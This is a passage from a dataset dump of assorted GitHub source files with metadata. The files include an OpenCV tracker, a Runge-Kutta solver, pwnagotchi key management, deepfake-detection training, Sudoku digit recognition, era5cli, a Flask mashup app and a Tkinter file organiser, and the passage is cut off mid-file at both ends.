0.5, (0, 255, 0), 2)\n        cv2.circle(frame, (centroid[0], centroid[1]), 4, (0, 255, 0), -1)\n\n    
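    # show the annotated frame and poll the keyboard once per iteration;\n    # masking cv2.waitKey(1) with 0xFF keeps only the low byte, so the\n    # comparison with ord(\"q\") behaves the same across platforms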
cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n\n if key == ord(\"q\"):\n break \n\ncv2.destroyAllWindows()\nvideo.release()\n\n\n \n ","repo_name":"huytranvan2010/Simple-Object-Tracking-with-OpenCV","sub_path":"object_tracker.py","file_name":"object_tracker.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73610327207","text":"import os\nfrom rackio_AI import RackioAI\nfrom rackio import Rackio\n\napp = Rackio()\n\nRackioAI(app)\n\nos.chdir('../..')\ncwd = os.getcwd()\n# filename is a Directory, from that directory it will load all .tpl files\nfilename = os.path.join(cwd, 'rackio_AI', 'data', 'Leak')\n\nRackioAI.load(filename)\n\nprint(RackioAI.data)","repo_name":"crivero7/RackioAI","sub_path":"rackio_AI/examples/example6.py","file_name":"example6.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74015767209","text":"from math import sqrt, exp, cos, sin\nimport matplotlib.pyplot as plt\n\n\ndef RungeKutta4(x0, xn, y0, z0, h):\n n = int((xn - x0)/h)\n # Containers for solutions\n xlist = [0] * (n + 1)\n ylist = [0] * (n + 1)\n zlist = [0] * (n + 1)\n\n xlist[0] = x = x0\n ylist[0] = y = y0\n zlist[0] = z = z0\n\n for i in range(1, n + 1):\n # see https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods\n k1 = h * f(x, y, z)\n l1 = h * g(x, y, z)\n k2 = h * f(x + 0.5 * h, y + 0.5 * k1, z + 0.5*l1)\n l2 = h * g(x + 0.5 * h, y + 0.5 * k1, z + 0.5*l1)\n k3 = h * f(x + 0.5 * h, y + 0.5 * k2, z + 0.5*l2)\n l3 = h * g(x + 0.5 * h, y + 0.5 * k2, z + 0.5*l2)\n k4 = h * f(x + h, y + k2, z + l2)\n l4 = h * g(x + h, y + k2, z + l2)\n xlist[i] = x = x0 + i * h\n ylist[i] = y = y + (k1 + 2*k2 + 2*k3 + k4) / 6\n zlist[i] = z = z + (l1 + 2*l2 + 2*l3 + l4) / 6\n\n return xlist, ylist\n\n\ndef g(x, y, z):\n # z' = 4y\n return 4*y\n\n\ndef f(x, y, z):\n # y' = z\n return z\n\n\ndef exact(x):\n # analytical solution y = exp(2*x)\n return exp(2*x)\n\n\ndef plot(x1, y1, x2, y2, color1, color2, linestyle1, linestyle2, h):\n dpi = 80\n fig = plt.figure(dpi=dpi, figsize=(1600 / dpi, 900 / dpi))\n\n plt.plot(x1, y1, color=color1, linestyle=linestyle1,\n label='Numerical Solution')\n plt.plot(x2, y2, color=color2, linestyle=linestyle2,\n label='Analytical Solution')\n equation = \"y'' - 4y = 0\"\n name = \"Gordievich Kirill\"\n university = \"SMTU\"\n title = '%s, h = %s, The Runge–Kutta method by %s, %s' %(equation, h, name, university)\n plt.title(title, fontsize=20)\n plt.xlabel('x', fontsize=20)\n plt.ylabel('y', fontsize=20)\n plt.legend(loc='upper right')\n plt.show()\n \n # Uncomment the following to print the figure:\n #file_name = str(h1) + '_2_RungeKutta4.png'\n #fig.savefig(file_name)","repo_name":"KirillGordievich/The-4th-order-Runge-Kutta-method-for-a-2nd-order-ODE","sub_path":"rungeKutta.py","file_name":"rungeKutta.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18076368233","text":"from Crypto.Signature import PKCS1_PSS\nfrom Crypto.PublicKey import RSA\nimport Crypto.Hash.SHA256 as SHA256\nimport base64\nimport hashlib\nimport os\nimport logging\n\nDefaultPath = \"/etc/pwnagotchi/\"\n\n\nclass KeyPair(object):\n def __init__(self, path=DefaultPath, view=None):\n self.path = path\n self.priv_path = os.path.join(path, \"id_rsa\")\n self.priv_key = None\n self.pub_path = 
\"%s.pub\" % self.priv_path\n self.pub_key = None\n self.fingerprint_path = os.path.join(path, \"fingerprint\")\n self._view = view\n\n if not os.path.exists(self.path):\n os.makedirs(self.path)\n\n while True:\n # first time, generate new keys\n if not os.path.exists(self.priv_path) or not os.path.exists(self.pub_path):\n self._view.on_keys_generation()\n logging.info(\"generating %s ...\" % self.priv_path)\n os.system(\"pwngrid -generate -keys '%s'\" % self.path)\n\n # load keys: they might be corrupted if the unit has been turned off during the generation, in this case\n # the exception will remove the files and go back at the beginning of this loop.\n try:\n with open(self.priv_path) as fp:\n self.priv_key = RSA.importKey(fp.read())\n\n with open(self.pub_path) as fp:\n self.pub_key = RSA.importKey(fp.read())\n self.pub_key_pem = self.pub_key.exportKey('PEM').decode(\"ascii\")\n # python is special\n if 'RSA PUBLIC KEY' not in self.pub_key_pem:\n self.pub_key_pem = self.pub_key_pem.replace('PUBLIC KEY', 'RSA PUBLIC KEY')\n\n pem_ascii = self.pub_key_pem.encode(\"ascii\")\n\n self.pub_key_pem_b64 = base64.b64encode(pem_ascii).decode(\"ascii\")\n self.fingerprint = hashlib.sha256(pem_ascii).hexdigest()\n\n with open(self.fingerprint_path, 'w+t') as fp:\n fp.write(self.fingerprint)\n\n # no exception, keys loaded correctly.\n self._view.on_starting()\n return\n\n except Exception as e:\n # if we're here, loading the keys broke something ...\n logging.exception(\"error loading keys, maybe corrupted, deleting and regenerating ...\")\n try:\n os.remove(self.priv_path)\n os.remove(self.pub_path)\n except:\n pass\n\n def sign(self, message):\n hasher = SHA256.new(message.encode(\"ascii\"))\n signer = PKCS1_PSS.new(self.priv_key, saltLen=16)\n signature = signer.sign(hasher)\n signature_b64 = base64.b64encode(signature).decode(\"ascii\")\n return signature, signature_b64\n","repo_name":"evilsocket/pwnagotchi","sub_path":"pwnagotchi/identity.py","file_name":"identity.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","stars":6448,"dataset":"github-code","pt":"53"} +{"seq_id":"2603641523","text":"import os\nimport time\nimport logging\nimport warnings\nimport numpy \nimport torch\nimport torch.nn as nn\nimport torch.multiprocessing as mp\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nimport torch.distributed as dist\nfrom models.MAT import MAT\nfrom datasets.dataset import DeepfakeDataset\nfrom AGDA import AGDA\nimport cv2\nfrom utils import dist_average,ACC\n#from torch.utils.tensorboard import SummaryWriter\ncv2.setNumThreads(0)\ncv2.ocl.setUseOpenCL(False)\n# GPU settings\nassert torch.cuda.is_available()\n#torch.autograd.set_detect_anomaly(True)\ndef load_state(net,ckpt):\n sd=net.state_dict()\n nd={}\n goodmatch=True\n for i in ckpt:\n if i in sd and sd[i].shape==ckpt[i].shape:\n nd[i]=ckpt[i]\n #print(i)\n else:\n print('fail to load %s'%i)\n goodmatch=False\n net.load_state_dict(nd,strict=False)\n return goodmatch\ndef main_worker(local_rank,world_size,rank_offset,config):\n rank=local_rank+rank_offset\n if rank==0:\n logging.basicConfig(\n filename=os.path.join('runs', config.name,'train.log'),\n filemode='a',\n format='%(asctime)s: %(levelname)s: [%(filename)s:%(lineno)d]: %(message)s',\n level=logging.INFO)\n warnings.filterwarnings(\"ignore\")\n dist.init_process_group(backend='nccl', init_method=config.url,world_size=world_size, rank=rank)\n # if rank==0:\n # try:\n # os.remove('/tmp/.pytorch_distribute')\n # 
except:\n # pass\n numpy.random.seed(1234567)\n torch.manual_seed(1234567)\n torch.cuda.manual_seed(1234567)\n torch.cuda.set_device(local_rank)\n train_dataset = DeepfakeDataset(phase='train',**config.train_dataset)\n validate_dataset=DeepfakeDataset(phase='test',**config.val_dataset)\n train_sampler=torch.utils.data.distributed.DistributedSampler(train_dataset)\n validate_sampler=torch.utils.data.distributed.DistributedSampler(validate_dataset)\n train_loader=torch.utils.data.DataLoader(train_dataset, batch_size=config.batch_size,sampler=train_sampler,pin_memory=True,num_workers=config.workers)\n validate_loader=torch.utils.data.DataLoader(validate_dataset, batch_size=config.batch_size,sampler=validate_sampler,pin_memory=True,num_workers=config.workers)\n logs = {}\n start_epoch = 0\n net = MAT(**config.net_config)\n for i in config.freeze:\n if 'backbone' in i:\n net.net.requires_grad_(False)\n elif 'attention' in i:\n net.attentions.requires_grad_(False)\n elif 'feature_center' in i:\n net.auxiliary_loss.alpha=0\n elif 'texture_enhance' in i:\n net.texture_enhance.requires_grad_(False)\n elif 'fcs' in i:\n net.projection_local.requires_grad_(False)\n net.project_final.requires_grad_(False)\n net.ensemble_classifier_fc.requires_grad_(False)\n else:\n if 'xception' in str(type(net.net)):\n for j in net.net.seq:\n if j[0]==i:\n for t in j[1]:\n t.requires_grad_(False)\n \n if 'EfficientNet' in str(type(net.net)):\n if i=='b0':\n net.net._conv_stem.requires_grad_(False)\n stage_map=net.net.stage_map\n for c in range(len(stage_map)-2,-1,-1):\n if not stage_map[c]:\n stage_map[c]=stage_map[c+1]\n for c1,c2 in zip(stage_map,net.net._blocks):\n if c1==i:\n c2.requires_grad_(False)\n\n net=nn.SyncBatchNorm.convert_sync_batchnorm(net).to(local_rank)\n net = nn.parallel.DistributedDataParallel(net,device_ids=[local_rank],output_device=local_rank,find_unused_parameters=True)\n AG=AGDA(**config.AGDA_config).to(local_rank)\n optimizer = torch.optim.AdamW(net.parameters(), lr=config.learning_rate, betas=config.adam_betas, weight_decay=config.weight_decay)\n scheduler=torch.optim.lr_scheduler.StepLR(optimizer, step_size=config.scheduler_step, gamma=config.scheduler_gamma)\n if config.ckpt:\n loc = 'cuda:{}'.format(local_rank)\n checkpoint = torch.load(config.ckpt, map_location=loc)\n logs = checkpoint['logs']\n start_epoch = int(logs['epoch'])+1\n if load_state(net.module,checkpoint['state_dict']) and config.resume_optim:\n optimizer.load_state_dict(checkpoint['optimizer_state'])\n try:\n scheduler.load_state_dict(checkpoint['scheduler_state'])\n except:\n pass\n else:\n net.module.auxiliary_loss.alpha=torch.tensor(config.alpha)\n del checkpoint\n torch.cuda.empty_cache()\n for epoch in range(start_epoch, config.epochs):\n logs['epoch'] = epoch\n train_sampler.set_epoch(epoch)\n train_sampler.dataset.next_epoch()\n run(logs=logs,data_loader=train_loader,net=net,optimizer=optimizer,local_rank=local_rank,config=config,AG=AG,phase='train')\n run(logs=logs,data_loader=validate_loader,net=net,optimizer=optimizer,local_rank=local_rank,config=config,phase='valid')\n net.module.auxiliary_loss.alpha*=config.alpha_decay\n scheduler.step()\n if local_rank==0:\n torch.save({\n 'logs': logs,\n 'state_dict': net.module.state_dict(),\n 'optimizer_state': optimizer.state_dict(),\n 'scheduler_state':scheduler.state_dict()}, 'checkpoints/'+config.name+'/ckpt_%s.pth'%epoch)\n dist.barrier()\n\ndef train_loss(loss_pack,config):\n if 'loss' in loss_pack:\n return loss_pack['loss']\n 
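# otherwise combine the weighted ensemble and auxiliary losses\n 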
loss=config.ensemble_loss_weight*loss_pack['ensemble_loss']+config.aux_loss_weight*loss_pack['aux_loss']\n if config.AGDA_loss_weight!=0:\n loss+=config.AGDA_loss_weight*loss_pack['AGDA_ensemble_loss']+config.match_loss_weight*loss_pack['match_loss']\n return loss\n \ndef run(logs,data_loader,net,optimizer,local_rank,config,AG=None,phase='train'):\n if local_rank==0:\n print('start ',phase)\n if config.AGDA_loss_weight==0:\n AG=None\n recorder={}\n if config.feature_layer=='logits':\n record_list=['loss','acc']\n else:\n record_list=['ensemble_loss','aux_loss','ensemble_acc']\n if AG is not None:\n record_list+=['AGDA_ensemble_loss','match_loss']\n for i in record_list:\n recorder[i]=dist_average(local_rank)\n # begin training\n start_time = time.time()\n if phase=='train':\n net.train()\n else: net.eval()\n for i, (X, y) in enumerate(data_loader):\n X = X.to(local_rank,non_blocking=True)\n y = y.to(local_rank,non_blocking=True)\n with torch.set_grad_enabled(phase=='train'):\n loss_pack=net(X,y,train_batch=True,AG=AG)\n if phase=='train':\n batch_loss = train_loss(loss_pack,config)\n batch_loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n with torch.no_grad():\n if config.feature_layer=='logits':\n loss_pack['acc']=ACC(loss_pack['logits'],y)\n else:\n loss_pack['ensemble_acc']=ACC(loss_pack['ensemble_logit'],y)\n for i in record_list:\n recorder[i].step(loss_pack[i])\n\n # end of this epoch\n batch_info=[]\n for i in record_list:\n mesg=recorder[i].get()\n logs[i]=mesg\n batch_info.append('{}:{:.4f}'.format(i,mesg))\n end_time = time.time()\n\n # write log for this epoch\n if local_rank==0:\n logging.info('{}: {}, Time {:3.2f}'.format(phase,' '.join(batch_info), end_time - start_time))\n\n\ndef distributed_train(config,world_size=0,num_gpus=0,rank_offset=0):\n if not num_gpus:\n num_gpus = torch.cuda.device_count()\n if not world_size:\n world_size=num_gpus\n mp.spawn(main_worker, nprocs=num_gpus, args=(world_size,rank_offset,config))\n torch.cuda.empty_cache()\n","repo_name":"yoctta/multiple-attention","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7960,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"53"}
{"seq_id":"40720755952","text":"import cv2 as cv\nimport numpy as np\n\nimport os\n\nfrom .img_prep import prep_box\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\nimport tensorflow as tf\n\n\ndef digit_recognition(boxes, photo=False):\n \"\"\"\n Recognizes the value of a digit inside a bounding box. The digit recognition model uses the MNIST dataset with added\n personal characters. Empty images are given a value of zero.\n\n :param boxes: Images that have a digit centralized.\n :param photo: True if the original image is a photo, False otherwise.\n :type photo: bool\n :return: 81 values recognized in image.\n :rtype: list\n \"\"\"\n # Loading digit recognition model and creating an empty list to store numbers found\n model = tf.keras.models.load_model('sudoku/utils/new_number_reader.model')\n nums_found = []\n\n for box in boxes:\n # Centering digits in bounding boxes and changing array format.\n if photo:\n box_prep = prep_box(box, photo=True)\n else:\n box_prep = prep_box(box)\n\n # Applying digit recognition model to image.\n prediction = model.predict(box_prep)\n\n # Selecting the digit with the highest probability and the probability value.\n class_idx = np.argmax(prediction, axis=-1)\n probability = np.amax(prediction)\n\n # Establishing a minimum probability for a digit to get appended. 
Appending zero if the value is not reached.\n if probability > 0.70:\n nums_found.append(class_idx[0])\n else:\n nums_found.append(0)\n\n return nums_found\n\n\ndef display_numbers(image, numbers, color=(0, 255, 0)):\n \"\"\"\n Places a digit in a specific area of an image. Values of zero will be ignored and given an empty space.\n\n :param image: Desired image to overlay digits on.\n :type image: ndarray\n :param numbers: Digits to be displayed on image.\n :type numbers: list\n :param color: Decimal code for desired color of digits to be displayed. Default color is green.\n :return: Original image with desired digits put on image.\n \"\"\"\n # Creating the dimensions that each digit will take up in the image.\n sec_w = int(image.shape[1] / 9)\n sec_h = int(image.shape[0] / 9)\n\n # Looping over Sudoku matrix values\n for row_idx in range(0, 9):\n for col_idx in range(0, 9):\n\n # Controlling so iterations skip index values that contain zero.\n if numbers[(col_idx * 9) + row_idx] != 0:\n # Putting digit on section of image.\n cv.putText(img=image,\n text=str(numbers[(col_idx * 9) + row_idx]),\n org=(row_idx * sec_w + int(sec_w / 2) - 10, int((col_idx + 0.8) * sec_h)),\n fontFace=cv.FONT_HERSHEY_COMPLEX_SMALL,\n fontScale=2,\n color=color,\n thickness=2,\n lineType=cv.LINE_AA)\n return image\n\n\ndef modified_array(nums_scanned, solution_nums):\n \"\"\"\n Determines if a value is shared between two lists at a specific index value. Values that are shared are replaced\n with zero.\n\n :param nums_scanned: Sudoku puzzle numbers with zero representing empty spaces.\n :type nums_scanned: ndarray\n :param solution_nums: All the numbers for the solution of Sudoku puzzle. No zeros.\n :type solution_nums: ndarray\n :return: Only the solution values of the Sudoku puzzle\n :rtype: list\n \"\"\"\n # Initializing empty list to store values.\n not_shared = []\n\n for idx, value in enumerate(solution_nums):\n\n # Adding zero if values match. If they do not, adding the value in solution_nums to not_shared.\n if nums_scanned[idx] == solution_nums[idx]:\n not_shared.append(0)\n else:\n not_shared.append(value)\n\n return not_shared\n\n\ndef stack_images(scale, img_array):\n \"\"\"\n Takes in multiple images and stacks them horizontally and vertically to create a new image. If images do not share\n the same dimensions, images are scaled to the dimensions of the first image in the inputted tuple.\n\n :param scale: Value to enlarge or reduce input images.\n :type scale: float\n :param img_array: Tuple of lists containing desired images. The number of lists inside tuple represent how many rows\n of images the final output will have. The number of images inside a list represent the number of columns. All\n lists must be of equal length. Input an empty image if lengths are not the same.\n :type img_array: any\n :return: A new image composed of all the images in img_array.\n \"\"\"\n # Finding the total number of rows and columns that will make up the final image.\n rows = len(img_array)\n cols = len(img_array[0])\n\n # Determining if first variable in tuple is a list or just an image.\n rows_available = isinstance(img_array[0], list)\n\n # Finding the dimension of the first image in the inputted tuple.\n width = img_array[0][0].shape[1]\n height = img_array[0][0].shape[0]\n\n # Control that determines if final image will have multiple rows or just one.\n if rows_available:\n for x in range(0, rows):\n for y in range(0, cols):\n\n # Converting dimensions of the current image when they do not match the first, 
and applying the desired scale.\n if img_array[x][y].shape[:2] == img_array[0][0].shape[:2]:\n img_array[x][y] = cv.resize(img_array[x][y],\n dsize=(0, 0), # Can be changed to None\n fx=scale,\n fy=scale)\n else:\n img_array[x][y] = cv.resize(img_array[x][y],\n dsize=(img_array[0][0].shape[1], img_array[0][0].shape[0]),\n fx=scale,\n fy=scale)\n\n # Converting black and white images to ensure they contain three color channels.\n if len(img_array[x][y].shape) == 2:\n img_array[x][y] = cv.cvtColor(img_array[x][y], cv.COLOR_GRAY2BGR)\n\n # Creating a list of black images whose length equals the desired number of rows.\n image_blank = np.zeros((height, width, 3), np.uint8)\n hor = [image_blank] * rows\n\n # Replacing black images with a horizontal stack of the images in an element of the inputted tuple.\n for x in range(0, rows):\n hor[x] = np.hstack(img_array[x])\n\n # Vertically stacking the horizontal stacks of images previously created to develop one image.\n ver = np.vstack(hor)\n\n else:\n for x in range(0, rows):\n\n # Converting dimensions of the current image when they do not match the first, and applying the desired scale.\n if img_array[x].shape[:2] == img_array[0].shape[:2]:\n img_array[x] = cv.resize(img_array[x],\n dsize=(0, 0),\n fx=scale,\n fy=scale)\n else:\n img_array[x] = cv.resize(img_array[x],\n dsize=(img_array[0].shape[1], img_array[0].shape[0]),\n fx=scale,\n fy=scale)\n\n # Converting black and white images to ensure they contain three color channels.\n if len(img_array[x].shape) == 2:\n img_array[x] = cv.cvtColor(img_array[x], cv.COLOR_GRAY2BGR)\n\n # Horizontally stacking images in the inputted tuple.\n hor = np.hstack(img_array)\n ver = hor\n\n return ver\n","repo_name":"jrobles32/Simple_Games","sub_path":"sudoku/img_sudoku/img_helpers.py","file_name":"img_helpers.py","file_ext":"py","file_size_in_byte":7804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"14788634046","text":"# -*- coding: utf-8 -*-\n\"\"\"\n commands.ingest\n ~~~~~~~~~~~~~~\n a command for csv ingestion\n\"\"\"\nimport click\nfrom flask.cli import AppGroup\nfrom .helpers import ingest_csv\n\ningest_cli = AppGroup('ingest')\n\n\n@ingest_cli.command('csv')\n@click.option('--table', help='The table to ingest to')\n@click.option('--csv', help=\"csv to ingest\")\n@click.option('--key', default='hash')\n@click.option('--batch-size', default=50)\ndef csv_ingest_command(table, csv, key='hash', batch_size=50):\n ingested_df = ingest_csv(table, csv, key, batch_size)\n click.echo(f'{len(ingested_df)} records ingested')\n","repo_name":"puhrez/insuratech","sub_path":"backend/insuratech/commands/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"3599570976","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPaulinho has a new problem on his hands. 
Now his teacher has asked him to build a program to check, given two\nvery large values A and B, whether B matches the last digits of A.\n\"\"\"\ndef main():\n N = int(input())\n while N > 0:\n A, B = ([i for i in input().split()])\n inversoA = A[::-1]\n inversoB = B[::-1]\n tamanhoB = len(B)\n resposta = str.find(inversoA, inversoB, 0, tamanhoB)\n if resposta == -1:\n print('nao encaixa')\n else:\n print('encaixa')\n N -= 1\n\nif __name__ == '__main__':\n main()\n","repo_name":"sywrahg/URI","sub_path":"1241 - Encaixa ou Não II.py","file_name":"1241 - Encaixa ou Não II.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"10987306279","text":"#!/usr/bin/env python\n\"\"\"Download ERA5 variables.\"\"\"\n\nimport argparse\nimport sys\nimport era5cli.fetch as efetch\nfrom era5cli import args\n\n\ndef _build_parser():\n \"\"\"Build the argument parser.\"\"\"\n parser = argparse.ArgumentParser(\n usage='Use \"%(prog)s --help\" for more information.',\n formatter_class=argparse.RawTextHelpFormatter,\n )\n subparsers = parser.add_subparsers(help=\"sub-command\", dest=\"command\")\n subparsers.required = True\n\n common = argparse.ArgumentParser(add_help=False)\n args.common.add_common_args(common)\n\n args.periods.add_period_args(subparsers, common)\n\n args.info.add_info_args(subparsers)\n\n args.config.add_config_args(subparsers)\n\n return parser\n\n\ndef _parse_args(args):\n \"\"\"Parse command line arguments.\"\"\"\n parser = _build_parser()\n return parser.parse_args(args)\n\n\ndef _execute(input_args: argparse.Namespace) -> bool:\n \"\"\"Execute the arguments given by the user.\"\"\"\n\n if input_args.command == \"info\":\n return args.info.run_info(input_args)\n\n if input_args.command == \"config\":\n return args.config.run_config(input_args)\n\n # the fetching subroutines\n years = args.common.construct_year_list(input_args)\n synoptic, statistics, splitmonths, days, hours = args.periods.set_period_args(\n input_args\n )\n\n # try to build and send download request\n era5 = efetch.Fetch(\n years,\n months=input_args.months,\n days=days,\n hours=hours,\n variables=input_args.variables,\n area=input_args.area,\n outputformat=input_args.format,\n outputprefix=input_args.outputprefix,\n period=input_args.command,\n ensemble=input_args.ensemble,\n synoptic=synoptic,\n statistics=statistics,\n pressurelevels=input_args.levels,\n threads=input_args.threads,\n splitmonths=splitmonths,\n merge=input_args.merge,\n prelimbe=input_args.prelimbe,\n land=input_args.land,\n overwrite=input_args.overwrite,\n dashed_vars=input_args.dashed_varname,\n )\n era5.fetch(dryrun=input_args.dryrun)\n return True\n\n\ndef main(argv=None):\n \"\"\"Run era5cli.\n\n argv is an optional kwarg to be used in testing. When called\n from the command line, the user-input arguments are retrieved\n using sys.argv.\n \"\"\"\n if argv is None:\n argv = sys.argv # pragma: no cover\n\n # Skip the first argument (i.e. 
'era5cli')\n args = _parse_args(argv[1:])\n _execute(args)\n\n\nif __name__ == \"__main__\":\n main() # pragma: no cover\n","repo_name":"eWaterCycle/era5cli","sub_path":"era5cli/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"}
{"seq_id":"17989769019","text":"from flask import Flask, render_template, request, redirect, url_for, make_response, Response\r\nfrom Mixer import Mixer\r\n\r\nimport stream_azure as saz\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route(\"/\")\r\ndef start():\r\n progress_bar = False\r\n song_list = saz.list_blobs_flat_listing()\r\n\r\n resp = make_response(render_template('index_main.html', song_list=song_list, progress_bar=progress_bar))\r\n resp.delete_cookie('song1')\r\n resp.delete_cookie('song2')\r\n resp.delete_cookie('mash_up_name')\r\n\r\n return resp\r\n\r\n\r\n@app.route(\"/action\", methods=['POST', 'GET'])\r\ndef action():\r\n progress_bar = True\r\n song_list = saz.list_blobs_flat_listing()\r\n song1 = request.form.get(\"song1\")\r\n song2 = request.form.get(\"song2\")\r\n mash_up_name = request.form.get(\"mashup_name\")\r\n\r\n resp = make_response(render_template('index_main.html', song_list=song_list, progress_bar=progress_bar))\r\n resp.set_cookie('song1', song1)\r\n resp.set_cookie('song2', song2)\r\n resp.set_cookie('mash_up_name', mash_up_name)\r\n\r\n return resp\r\n\r\n\r\n@app.route(\"/work_progress\", methods=['POST', 'GET'])\r\ndef work_progress():\r\n song1 = request.cookies.get('song1')\r\n song2 = request.cookies.get('song2')\r\n mash_up_name = request.cookies.get('mash_up_name')\r\n if song1 or song2:\r\n mixer = Mixer()\r\n return Response(mixer.mix(song1, song2, mash_up_name), mimetype='text/event-stream')\r\n return 'ERROR: Missing song names, refresh and try again'\r\n\r\n\r\n@app.route(\"/player\", methods=['POST', 'GET'])\r\ndef test():\r\n mash_up_name = request.cookies.get('mash_up_name')\r\n mash_url = 'https://mashups.blob.core.windows.net/mashups/mixed_songs/' + mash_up_name + '.wav'\r\n mash_url = mash_url.replace(' ', '%20')\r\n # return only the rendered page; a trailing tuple element would be treated as the HTTP status\r\n return render_template('index_second_page.html', mashup_url=mash_url)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(port=5005, debug=False)\r\n","repo_name":"alexandrova-s/Mash-up-Generator","sub_path":"flask_call_mashup.py","file_name":"flask_call_mashup.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"12483785669","text":"from tkinter import*\r\nimport os, shutil, time\r\nfrom tkinter import ttk, filedialog, messagebox #using filedialog we can open a popup where we can pick the directory.\r\nclass Sorting_App:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title(\"File Arrangement Application | Developed by Vivek Maurya\")\r\n self.root.geometry(\"1350x700+0+0\")\r\n self.root.resizable(0,0)\r\n self.root.config(bg=\"white\")\r\n self.logo_icon=PhotoImage(file=\"E:\\\\PythonProject\\\\Arrange_File_Application\\\\res\\\\appiconre.png\")\r\n title = Label(self.root, text=\"File Arrangement Application\",padx=15,image=self.logo_icon, compound=LEFT, font=(\"impact\", 40), bg=\"maroon\", fg=\"white\", anchor=\"w\").place(x=0, y=0, relwidth=1)\r\n\r\n\r\n #======Section 1=======\r\n self.var_foldername=StringVar()\r\n lbl_select_folder=Label(self.root, text=\"Select Folder\", font=(\"times new roman\", 20, \"bold\"), bg=\"white\").place(x=50, 
y=100,)\r\n txt_folder_name = Entry(self.root, textvariable=self.var_foldername, font=(\"times new roman\", 15),state=\"readonly\", bg=\"maroon\").place(x=250, y=100, height=40, width=600)\r\n btn_browse = Button(self.root, text=\"BROWSE\", command=self.browse, bd=2, relief=RAISED, font=(\"times new roman\", 15, \"bold\"), cursor=\"hand2\", bg=\"gray\", fg=\"white\", activebackground=\"gray\", activeforeground=\"white\").place(x=900, y=100, height=40, width=200)\r\n hr = Label(self.root, bg=\"lightgrey\").place(x=50, y=160, height=2, width=1250)\r\n\r\n #======Section 2=======\r\n #======All Extensions=======\r\n self.image_extensions=[\"Image Extensions\", '.jpg','.png', '.jpeg', '.JPG']\r\n self.audio_extensions=[\"Audio Extensions\", '.wav','.mp3', '.m4a']\r\n self.video_extensions=[\"Video Extensions\", '.mp4', '.mkv']\r\n self.doc_extensions=[\"Document Extensions\", '.doc', '.xlsx', '.xls', '.xml', '.csv', '.pdf', '.docx', '.pptx', '.ppt', '.zip', '.rar']\r\n\r\n self.folders={\r\n 'videos':self.video_extensions,\r\n 'audios':self.audio_extensions,\r\n 'images':self.image_extensions,\r\n 'documents':self.doc_extensions\r\n }\r\n\r\n lbl_support_ext=Label(self.root, text=\"Various Supported Extensions\", font=(\"times new roman\", 20, \"bold\"), bg=\"white\").place(x=50, y=170,)\r\n self.image_box = ttk.Combobox(self.root,state=\"readonly\", values=self.image_extensions, font=(\"times new roman\", 15), justify=\"center\")\r\n self.image_box.place(x=60, y=230, width=270, height=35)\r\n self.image_box.current(0)\r\n\r\n self.video_box = ttk.Combobox(self.root,state=\"readonly\", values=self.video_extensions, font=(\"times new roman\", 15), justify=\"center\")\r\n self.video_box.place(x=380, y=230, width=270, height=35)\r\n self.video_box.current(0)\r\n\r\n self.audio_box = ttk.Combobox(self.root,state=\"readonly\", values=self.audio_extensions, font=(\"times new roman\", 15), justify=\"center\")\r\n self.audio_box.place(x=700, y=230, width=270, height=35)\r\n self.audio_box.current(0)\r\n\r\n self.doc_box = ttk.Combobox(self.root,state=\"readonly\", values=self.doc_extensions, font=(\"times new roman\", 15), justify=\"center\")\r\n self.doc_box.place(x=1020, y=230, width=270, height=35)\r\n self.doc_box.current(0)\r\n\r\n #======Section 3=======\r\n #======All Image icons=======\r\n self.image_icon=PhotoImage(file=\"E:\\\\PythonProject\\\\Arrange_File_Application\\\\res\\\\imgre.png\")\r\n self.audio_icon=PhotoImage(file=\"E:\\\\PythonProject\\\\Arrange_File_Application\\\\res\\\\audiore.png\")\r\n self.video_icon=PhotoImage(file=\"E:\\\\PythonProject\\\\Arrange_File_Application\\\\res\\\\videore.png\")\r\n self.docum_icon=PhotoImage(file=\"E:\\\\PythonProject\\\\Arrange_File_Application\\\\res\\\\docre.png\")\r\n self.other_icon=PhotoImage(file=\"E:\\\\PythonProject\\\\Arrange_File_Application\\\\res\\\\unknownbgre.png\")\r\n\r\n Frame1 = Frame(self.root, bd=2, relief=RIDGE, bg=\"white\")\r\n Frame1.place(x=50, y=300, width=1250, height=300)\r\n\r\n self.lbl_total_files=Label(Frame1, text=\"Total Files: 0\", font=(\"times new roman\", 17), bg=\"white\")\r\n self.lbl_total_files.place(x=10,y=10)\r\n\r\n self.lbl_total_image = Label(Frame1, bd=2, relief=RAISED,pady=10, text=\"\", image=self.image_icon, compound=TOP, font=(\"times new roman\", 17, \"bold\"), bg=\"#008EA4\", fg=\"white\")\r\n self.lbl_total_image.place(x=16.66, y=60, width=230, height=200)\r\n\r\n self.lbl_total_audio = Label(Frame1, bd=2, relief=RAISED, 